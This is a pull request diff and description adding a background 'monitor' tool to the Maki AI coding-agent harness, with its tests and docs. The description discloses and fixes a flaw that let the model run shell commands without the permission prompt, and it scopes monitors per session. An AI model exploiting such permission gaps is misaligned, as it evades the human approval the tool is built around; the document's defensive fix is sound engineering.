+        state.sync_session(&history, &permissions);
+
+        assert_eq!(state.session.messages.len(), 1);
+        assert!(!state.session.messages[0].is_observation());
     }
 
     #[test]

--- a/maki-ui/src/app/tests.rs
+++ b/maki-ui/src/app/tests.rs
@@ -209,6 +209,22 @@ fn typing_and_submit() {
     assert_eq!(app.main_chat().last_message_text(), "hi");
 }
 
+#[test]
+fn mailbox_wake_starts_without_an_empty_user_bubble() {
+    let mut app = test_app();
+    let actions = app.start_mailbox_run(vec![Message::observation("failed".into())]);
+
+    assert!(matches!(
+        &actions[..],
+        [Action::SendMessage(input)]
+            if input.message.is_empty()
+                && input.preamble.len() == 1
+                && input.preamble[0].is_observation()
+    ));
+    assert_eq!(app.status, Status::Streaming);
+    assert!(app.main_chat().segment_search_texts().is_empty());
+}
+
 fn with_text(app: &mut App) {
     app.update(Msg::Key(key(KeyCode::Char('h'))));
     app.update(Msg::Key(key(KeyCode::Char('i'))));

--- a/maki-ui/src/event_loop.rs
+++ b/maki-ui/src/event_loop.rs
@@ -111,6 +111,17 @@ impl SessionStatus {
     }
 }
 
+fn claim_idle_wake(
+    status: SessionStatus,
+    claim: impl FnOnce() -> Vec<Message>,
+) -> Option<Vec<Message>> {
+    if status != SessionStatus::Idle {
+        return None;
+    }
+    let preamble = claim();
+    (!preamble.is_empty()).then_some(preamble)
+}
+
 fn parse_session_id(id: &str) -> Result<MakiId, String> {
     id.parse().map_err(|e: MakiIdParseError| e.to_string())
 }
@@ -535,6 +546,7 @@ impl<'t> EventLoop<'t> {
         drop(slot_model);
 
         self.emit_status_changes();
+        self.start_mailbox_runs();
         Ok(())
     }
 
@@ -605,6 +617,25 @@ impl<'t> EventLoop<'t> {
                     "focused": i == self.focused,
                 }),
             );
+        }
+    }
+
+    fn start_mailbox_runs(&mut self) {
+        let ready: Vec<_> = self
+            .sessions
+            .iter()
+            .enumerate()
+            .filter_map(|(index, runtime)| {
+                claim_idle_wake(SessionStatus::of(&runtime.app), || {
+                    runtime.handles.claim_mailbox_wake()
+                })
+                .map(|preamble| (index, preamble))
+            })
+            .collect();
+
+        for (index, preamble) in ready {
+            let actions = self.sessions[index].app.start_mailbox_run(preamble);
+            self.dispatch(index, actions);
         }
     }
 
@@ -1143,5 +1174,41 @@ fn scroll_delta(kind: MouseEventKind, lines: u32) -> i32 {
         lines as i32
     } else {
         -(lines as i32)
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use std::cell::Cell;
+
+    use super::*;
+
+    const OBSERVATION: &str = "failed";
+
+    #[test]
+    fn idle_wake_claims_a_non_empty_preamble() {
+        let preamble = claim_idle_wake(SessionStatus::Idle, || {
+            vec![Message::observation(OBSERVATION.into())]
+        })
+        .unwrap();
+
+        assert_eq!(preamble.len(), 1);
+        assert_eq!(preamble[0].user_text(), Some(OBSERVATION));
+    }
+
+    #[test]
+    fn idle_without_messages_and_non_idle_sessions_do_not_start() {
+        assert!(claim_idle_wake(SessionStatus::Idle, Vec::new).is_none());
+
+        for status in [SessionStatus::Working, SessionStatus::NeedsInput] {
+            let called = Cell::new(false);
+            let preamble = claim_idle_wake(status, || {
+                called.set(true);
+                vec![Message::observation(OBSERVATION.into())]
+            });
+
+            assert!(preamble.is_none());
+            assert!(!called.get());
+        }
     }
 }

--- a/plugins/monitor/init.lua
+++ b/plugins/monitor/init.lua
@@ -1,6 +1,6 @@
 -- Watch a long-running command and let the agent hear about it later.
 --
--- The job outlives the tool call that started it (owner = "session"), and
+-- The job outlives the tool call that started it (owner = "plugin"), and
 -- each interesting line goes to the session mailbox instead of being sent
 -- as its own prompt, so a chatty watcher costs nothing until the agent
 -- runs again.
@@ -35,9 +35,22 @@ local SCHEMA = {
   additionalProperties = false,
 }
 
-local function report(entry, line)
-  if entry.match and not line:match(entry.match) then
-    return
+local function report(entry, line, prefix)
+  if entry.match then
+    local ok, matched = pcall(string.match, line, entry.match)
+    if not ok then
+      if not entry.match_error then
+        entry.match_error = true
+        maki.session.notify(
+          string.format("[%s] invalid match pattern: %s", entry.label, tostring(matched)),
+          { session = entry.session }
+        )
+      end
+      return
+    end
+    if not matched then
+      return
+    end
   end
   entry.seen = entry.seen + 1
   if entry.seen > MAX_LINES then
@@ -50,7 +63,10 @@ local function report(entry, line)
     end
     return
   end
-  maki.session.notify(string.format("[%s] %s", entry.label, line), { session = entry.session, wake = entry.wake })
+  maki.session.notify(
+    string.format("[%s] %s%s", entry.label, prefix or "", line),
+    { session = entry.session, wake = entry.wake }
+  )
 end
 
 -- Labels and commands are whatever the model sent, newlines and all,
@@ -148,6 +164,16 @@ maki.api.register_tool({
       return no_session
     end
 
+    if input.match then
+      local ok, match_err = pcall(string.match, "", input.match)
+      if not ok then
+        return {
+          llm_output = "error: invalid match pattern: " .. tostring(match_err),
+          is_error = true,
+        }
+      end
+    end
+
     local entry = {
       command = command,
       label = input.label,
@@ -158,11 +184,17 @@ maki.api.register_tool({
     }
 
     local id, start_err = maki.fn.jobstart(command, {
-      owner = "session",
+      owner = "plugin",
       on_stdout = function(job_id, line)
         local e = monitors[job_id]
         if e then
           report(e, line)
+        end
+      end,
+      on_stderr = function(job_id, line)
+        local e = monitors[job_id]
+        if e then
+          report(e, line, "stderr: ")
         end
       end,
       on_exit = function(job_id, code)
@@ -254,15 +286,17 @@ maki.api.register_command({
   end,
 })
 
--- Unlike `stop`, this cannot tell whose monitors these are: SessionReset
--- does not yet name the session that ended, so one session resetting
--- takes down every session's watchers. Right with one session open and
--- wrong with several; it wants the event to carry the id.
-local function stop_all()
-  for id in pairs(monitors) do
-    maki.fn.jobstop(id)
+local function stop_session(ev)
+  local session = ev.data and ev.data.session_id
+  if not session then
+    return
   end
-  monitors = {}
+  for id, entry in pairs(monitors) do
+    if entry.session == session then
+      maki.fn.jobstop(id)
+      monitors[id] = nil
+    end
+  end
 end
 
-maki.api.create_autocmd({ "SessionReset" }, { callback = stop_all })
+maki.api.create_autocmd({ "SessionReset" }, { callback = stop_session })

--- a/plugins/monitor/init.lua
+++ b/plugins/monitor/init.lua
@@ -1,0 +1,268 @@
+-- Watch a long-running command and let the agent hear about it later.
+--
+-- The job outlives the tool call that started it (owner = "session"), and
+-- each interesting line goes to the session mailbox instead of being sent
+-- as its own prompt, so a chatty watcher costs nothing until the agent
+-- runs again.
+
+local monitors = {}
+
+-- A watcher that floods would quietly undo the point of the mailbox, so
+-- each one gets a budget and then goes quiet with one line saying so.
+local MAX_LINES = 200
+
+local SCHEMA = {
+  type = "object",
+  properties = {
+    command = {
+      type = "string",
+      description = "Shell command that prints one line per event, e.g. `tail -f app.log | grep --line-buffered ERROR`.",
+    },
+    label = {
+      type = "string",
+      description = "Short name for this monitor, shown with every line it reports.",
+    },
+    match = {
+      type = "string",
+      description = "Lua pattern. When set, only matching lines are reported.",
+    },
+    wake = {
+      type = "boolean",
+      description = "Interrupt an idle agent instead of waiting for the next turn. Off by default; use it only for events worth stopping for.",
+    },
+  },
+  required = { "command" },
+  additionalProperties = false,
+}
+
+local function report(entry, line)
+  if entry.match and not line:match(entry.match) then
+    return
+  end
+  entry.seen = entry.seen + 1
+  if entry.seen > MAX_LINES then
+    if not entry.capped then
+      entry.capped = true
+      maki.session.notify(
+        string.format("[%s] stopped reporting after %d lines", entry.label, MAX_LINES),
+        { session = entry.session }
+      )
+    end
+    return
+  end
+  maki.session.notify(string.format("[%s] %s", entry.label, line), { session = entry.session, wake = entry.wake })
+end
+
+-- Labels and commands are whatever the model sent, newlines and all,
+-- and both get rendered a line per monitor. Left as they came, one entry
+-- could draw rows of its own and invent or hide a monitor in a listing
+-- someone is reading to decide what to stop.
+local function one_line(s)
+  return (tostring(s):gsub("%s+", " "))
+end
+
+-- One Lua runtime serves every session in the UI, so this table holds
+-- other sessions' monitors too and their ids are small integers anyone
+-- could land on. A session may only stop its own: answer for someone
+-- else's exactly as for one that was never started, so the reply says
+-- nothing about what another session is watching.
+local function stop(id, session)
+  local entry = monitors[id]
+  if not entry or entry.session ~= session then
+    return false
+  end
+  maki.fn.jobstop(id)
+  monitors[id] = nil
+  return true
+end
+
+-- The one description of what is running, so the palette and the model
+-- never disagree about it. A {session} of nil lists every session's
+-- monitors, which is the human's view of the machine and deliberately
+-- not the model's. Ids come back out of a hash table in no order, and
+-- sorting the rendered lines would put 10 before 2, so sort the ids.
+local function listing(session)
+  local ids = {}
+  for id, entry in pairs(monitors) do
+    if session == nil or entry.session == session then
+      ids[#ids + 1] = id
+    end
+  end
+  table.sort(ids)
+
+  local lines = {}
+  for _, id in ipairs(ids) do
+    local entry = monitors[id]
+    local line = string.format("%d  %s  %s", id, entry.label, one_line(entry.command))
+    if entry.capped then
+      line = line .. string.format("  (quiet since %d lines)", MAX_LINES)
+    end
+    lines[#lines + 1] = line
+  end
+  return lines
+end
+
+-- Every model-facing entry point has to know which session is asking,
+-- both to own what it starts and to be kept out of what it did not.
+local function caller_session(ctx)
+  local session, err = ctx:session_id()
+  if err or not session then
+    return nil,
+      {
+        llm_output = "error: a monitor needs a session, and this tool is not running for one",
+        is_error = true,
+      }
+  end
+  return session, nil
+end
+
+maki.api.register_tool({
+  name = "monitor",
+  description = "Watch a command in the background and report what it prints. "
+    .. "Returns straight away; lines arrive later, with the next turn. "
+    .. "Use it for a dev server, a test watcher, or a deploy, when you want "
+    .. "to know what happened without asking again. Stop it with monitor_stop.",
+  schema = SCHEMA,
+  -- Starting a job needs the `run` permission, which a bundled plugin
+  -- already has. That covers the plugin, not the command: without a scope
+  -- here the model could run through this tool anything the bash tool
+  -- would have had to ask about first. Always prompt rather than reuse a
+  -- standing grant, because the job outlives the call it was granted to,
+  -- and an "always allow" answered for a command that runs once never
+  -- agreed to one that keeps running.
+  permission_scopes = function(input)
+    local command = input.command
+    if not command or command:match("^%s*$") then
+      return nil
+    end
+    return { scopes = { command }, force_prompt = true }
+  end,
+  handler = function(input, ctx)
+    local command = input.command
+    if not command or command:match("^%s*$") then
+      return { llm_output = "error: command must not be blank", is_error = true }
+    end
+
+    local session, no_session = caller_session(ctx)
+    if no_session then
+      return no_session
+    end
+
+    local entry = {
+      command = command,
+      label = input.label,
+      match = input.match,
+      wake = input.wake or false,
+      session = session,
+      seen = 0,
+    }
+
+    local id, start_err = maki.fn.jobstart(command, {
+      owner = "session",
+      on_stdout = function(job_id, line)
+        local e = monitors[job_id]
+        if e then
+          report(e, line)
+        end
+      end,
+      on_exit = function(job_id, code)
+        local e = monitors[job_id]
+        if e then
+          monitors[job_id] = nil
+          maki.session.notify(string.format("[%s] exited with %d", e.label, code), { session = e.session })
+        end
+      end,
+    })
+    if start_err then
+      return { llm_output = "error: " .. tostring(start_err), is_error = true }
+    end
+
+    -- Naming an unnamed monitor after its own id keeps the two things the
+    -- model has to keep together — what it reads in a report and what it
+    -- passes to monitor_stop — from drifting apart, and needs no counter
+    -- of its own to carry numbering between sessions.
+    if entry.label and entry.label ~= "" then
+      entry.label = one_line(entry.label)
+    else
+      entry.label = "monitor " .. id
+    end
+
+    monitors[id] = entry
+    return string.format("%s watching `%s` (id %d)", entry.label, command, id)
+  end,
+})
+
+maki.api.register_tool({
+  name = "monitor_stop",
+  description = "Stop a monitor started with the monitor tool.",
+  schema = {
+    type = "object",
+    properties = { id = { type = "integer", description = "Monitor id." } },
+    required = { "id" },
+    additionalProperties = false,
+  },
+  handler = function(input, ctx)
+    local session, no_session = caller_session(ctx)
+    if no_session then
+      return no_session
+    end
+    if stop(input.id, session) then
+      return "stopped monitor " .. input.id
+    end
+    return {
+      llm_output = "error: no monitor with id " .. tostring(input.id) .. "; monitor_list shows the ones still running",
+      is_error = true,
+    }
+  end,
+})
+
+-- A monitor is started once and stopped a turn or an hour later, by
+-- which point the id it was given may have been compacted away. Without
+-- somewhere to look it up the model can start watchers it has no way to
+-- call off; `/monitors` shows the same list, but only to a human.
+maki.api.register_tool({
+  name = "monitor_list",
+  description = "List the monitors running in this session, with their ids. "
+    .. "Use it to find the id of a monitor you want to stop.",
+  schema = { type = "object", properties = {}, additionalProperties = false },
+  handler = function(_, ctx)
+    local session, no_session = caller_session(ctx)
+    if no_session then
+      return no_session
+    end
+    local lines = listing(session)
+    if #lines == 0 then
+      return "no monitors running"
+    end
+    return table.concat(lines, "\n")
+  end,
+})
+
+-- The model is asked before a monitor starts, but the job outlives that
+-- one call, so the person who granted it needs a way to see what is
+-- still running and to call it off.
+maki.api.register_command({
+  name = "/monitors",
+  description = "List running monitors",
+  handler = function()
+    local lines = listing(nil)
+    if #lines == 0 then
+      maki.ui.flash("no monitors running")
+      return
+    end
+    maki.ui.flash(table.concat(lines, "\n"))
+  end,
+})
+
+-- Unlike `stop`, this cannot tell whose monitors these are: SessionReset
+-- does not yet name the session that ended, so one session resetting
+-- takes down every session's watchers. Right with one session open and
+-- wrong with several; it wants the event to carry the id.
+local function stop_all()
+  for id in pairs(monitors) do
+    maki.fn.jobstop(id)
+  end
+  monitors = {}
+end
+
+maki.api.create_autocmd({ "SessionReset" }, { callback = stop_all })

--- a/site/docs/content/commands/_index.md
+++ b/site/docs/content/commands/_index.md
@@ -32,6 +32,7 @@ Type `/` in the input box to open the command palette.
 | `/exit` | Exit the application |
 | `/reload` | Reload plugins and config |
 | `/memory` | View, edit, and delete memory files |
+| `/monitors` | List running monitors |
 | `/rename` | Rename the current session |
 | `/sessions` | Browse and switch sessions |
 

--- a/site/docs/content/lua-api/_index.md
+++ b/site/docs/content/lua-api/_index.md
@@ -1320,6 +1320,9 @@ that you can pass to `jobstop` or `jobwait` to control the process.
   - `on_stdout` (`function?`) called with `(job_id, line)` for each stdout line.
   - `on_stderr` (`function?`) called with `(job_id, line)` for each stderr line.
   - `on_exit` (`function?`) called with `(job_id, code)` when the process finishes.
+  - `owner` (`string?`) job lifetime. `"task"` (default) ends the job with
+    the current call. `"plugin"` keeps it alive until the plugin unloads
+    or reloads.
 
 **Returns:** (`integer`) Job id.
 

--- a/site/docs/content/lua-api/_index.md
+++ b/site/docs/content/lua-api/_index.md
@@ -2490,9 +2490,9 @@ end
 
 Host session primitives. The interactive UI can run several sessions
 at once; these functions let plugins list, create, focus, rename, and
-delete them. Every call round-trips to the UI event loop and returns
-the pair `(value, err)`. Without an interactive UI attached, every
-call returns `nil, "no interactive UI attached"`.
+delete them. Session management returns `nil, "no interactive UI
+attached"` without a UI. `notify` instead targets a live agent mailbox
+directly, so it also works under ACP and SDK frontends.
 
 ---
 
@@ -2647,6 +2647,32 @@ the prompt is queued and picked up when the agent reaches it.
 
 ```lua
 local state, err = maki.session.prompt("run the tests", { session = id })
+```
+
+---
+
+### `maki.session.notify()` {#maki-session-notify}
+
+```lua
+maki.session.notify({text}, {opts?})
+```
+
+Reports {text} to a live session without creating a user turn. The
+observation waits for the session's next agent run.
+
+**Parameters:**
+
+- `{text}` (`string`) What to report. Must not be blank.
+- `{opts?}` (`table`) Options:
+  - `session` (`string`) id of a live session.
+  - `wake` (`boolean`) start a TUI turn when it next becomes idle (default false).
+
+**Returns:** (`boolean|nil`, `string|nil`) true, or nil and an error.
+
+**Example:**
+
+```lua
+maki.session.notify("[monitor] deploy failed", { session = id, wake = true })
 ```
 
 ---

--- a/site/docs/content/tools/_index.md
+++ b/site/docs/content/tools/_index.md
@@ -7,7 +7,7 @@ group = "Reference"
 
 # Tools
 
-Maki ships with 20 built-in tools. This is the full reference.
+Maki ships with 23 built-in tools. This is the full reference.
 
 ## File Operations
 
@@ -152,6 +152,30 @@ Use this tool when you need to ask the user questions during execution. This all
 | Parameter | Type | Required | Description |
 |-----------|------|----------|-------------|
 | `questions` | array | yes | List of questions to ask the user |
+
+### `monitor` *(lua plugin)*
+
+Watch a command in the background and report what it prints. Returns straight away; lines arrive later, with the next turn. Use it for a dev server, a test watcher, or a deploy, when you want to know what happened without asking again. Stop it with monitor_stop.
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `command` | string | yes | Shell command that prints one line per event, e.g. `tail -f app.log \| grep --line-buffered ERROR`. |
+| `label` | string | no | Short name for this monitor, shown with every line it reports. |
+| `match` | string | no | Lua pattern. When set, only matching lines are reported. |
+| `wake` | boolean | no | Interrupt an idle agent instead of waiting for the next turn. Off by default; use it only for events worth stopping for. |
+
+### `monitor_stop` *(lua plugin)*
+
+Stop a monitor started with the monitor tool.
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `id` | integer | yes | Monitor id. |
+
+### `monitor_list` *(lua plugin)*
+
+List the monitors running in this session, with their ids. Use it to find the id of a monitor you want to stop.
+
 
 ## Agent & Knowledge
 


### PR DESCRIPTION
PR 4 of 4 for #676, the one that makes the other three worth having. **Stacked on #692 and #691** — it needs owner-scoped jobs from one and `session.notify` from the other, so the diff here is `plugins/monitor/init.lua` plus its registration and tests.

## What it does

```
monitor { command = "tail -f app.log | grep --line-buffered ERROR", label = "errors" }
```

Starts the command as an `owner = "session"` job and returns straight away. Each line it cares about goes to the session mailbox, so it rides out with the next turn instead of buying one. `monitor_stop` ends it, `monitor_list` says what is running, `/monitors` shows the same to a human, and a session reset takes them all with it.

Options are `label`, `match` (a lua pattern, so a watcher can filter at the source instead of reporting everything), and `wake` for the rare event worth interrupting an idle agent for. `wake` is off by default and deliberately awkward to reach for.

## Asking before it runs

The first push of this branch got this wrong and I want to be plain about it, because it is the part most worth your eye.

`monitor` takes a whole shell command, and it registered with no `permission_scopes`. `enforce_permission` skips the check entirely when scopes come back `None`, so the tool ran anything the model asked for without the prompt `bash` requires — a clean bypass, since a bundled plugin already holds `run`. It now declares scopes with `force_prompt = true`: the job outlives the call it was granted to, so a standing yes to a command that runs once was never a yes to one that keeps running. `monitor_always_asks_before_running_a_command` pins it, and fails on exactly that assertion if the callback is removed.

## One runtime, several sessions

Chasing the second problem — the model could start monitors it had no way to stop, since the id only ever appeared in prose and `/monitors` is human-only — turned up that a single `PluginHost` serves every session, so the plugin's `monitors` table is shared. `monitor_list` would have handed one session another's ids, and `monitor_stop` would have acted on them.

So both are scoped to the caller via `ctx:session_id()`, and a stop for someone else's monitor answers exactly as for one that never existed. `/monitors` stays deliberately global: that is the human's view of their own machine. A listing also stays one row per monitor whatever the model put in a label — a newline in `label` or `command` could otherwise draw rows and invent or bury a neighbour in the list someone is reading to decide what to stop.

## The parts that are policy, not plumbing

You said filtering, formatting and caps belong in the plugin, so they are here rather than in core:

- **A budget.** A watcher that floods would quietly undo the whole point of the mailbox, so each one reports at most 200 lines and then says once that it has gone quiet. Dropping silently would be worse than the cost.
- **The tools for calling it off ship with it, not after.** `jobstart` needs `run`, and a job outliving its call splits the grant from the effect. Without somewhere to see what is still running and end it, the permission stops meaning anything.
- **A monitor refuses to start without a session**, rather than starting one whose output has nowhere to go.
- **An unnamed monitor is named after its own id**, so what a report says and what stops it agree, and no counter carries numbering between sessions.

## Testing

`just ci` green, 3413 tests, docs regenerated for the three tools and the command.

Four behavioural tests now, against a real `PluginHost` with the builtins loaded — the earlier version of this PR had none, and said so:

- permission scopes are always computed, and force the prompt
- a session sees and stops only its own monitors, and cannot stop another's
- `monitor_list` refuses rather than listing everything when it cannot tell who is asking
- a label or command carrying newlines still renders as one row

I checked each of these fails when its fix is reverted, rather than trusting that green means covered.

## Known, and not fixed here

`SessionReset` takes down every session's monitors, not just the one being reset, because the event does not yet name the session that ended — that is #689, which is not in this stack. The plugin says so where it matters rather than pretending otherwise. Once #689 lands this is a two-line change.

## The set

1. #687 session id on the tool ctx
2. #692 job owner and one store
3. #691 message kind and the mailbox
4. this

Plus three bugs found on the way: #688, #689, #690.

---

AI use, per CONTRIBUTING: written with Claude Code at my direction, as with the rest of the set. I directed the approach, took your counter-proposal over my own on the session id, and kept the owner-domain objection on the issue rather than in the code.
